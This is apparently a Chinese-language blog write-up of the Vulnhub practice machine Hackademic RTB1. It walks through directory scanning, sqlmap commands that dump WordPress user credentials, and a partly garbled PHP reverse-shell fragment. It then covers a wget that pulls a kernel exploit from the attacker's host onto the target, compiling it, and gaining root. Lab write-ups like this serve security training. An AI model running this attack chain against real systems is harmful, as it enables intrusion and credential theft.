【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

靶机介绍
官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/
【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第1张图片
需要读取靶机的root目录下key.txt
运行环境:
虚拟机网络设置的是NAT模式
靶机:IP地址:192.168.233.131
攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第2张图片

进入靶机

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第3张图片​​

用wappalyzer查看用到技术

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第4张图片

查看开放的端口

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第5张图片

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第6张图片

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第7张图片

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第8张图片

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第9张图片

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第10张图片

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第11张图片

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第12张图片

GeorgeMiller、q1w2e3登录

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第13张图片

getshell

shell.php

$sock, 1 => $sock, 2 => $sock); $peocess = proc_open('/bin/sh',$descriptorspec,$pipes); proc_close($process); ?>

上传shell

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第14张图片

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第15张图片

kali打开监听

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第16张图片

运行反弹shell

image-20230703204715657

反弹shell成功

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第17张图片

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第18张图片​搜索内核漏洞

searchsploit 2.6.31

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第19张图片

下载到本地searchsploit -m 15285.c

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第20张图片​kali开启web服务器

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第21张图片

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第22张图片

编译脚本

gcc 15285.c -o exp

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第23张图片

将编译的exp赋予执行权限并执行exp

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第24张图片

提权成功id为0

【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup_第25张图片

你可能感兴趣的:(vulnhub,vulnhub,writeup,安全,笔记)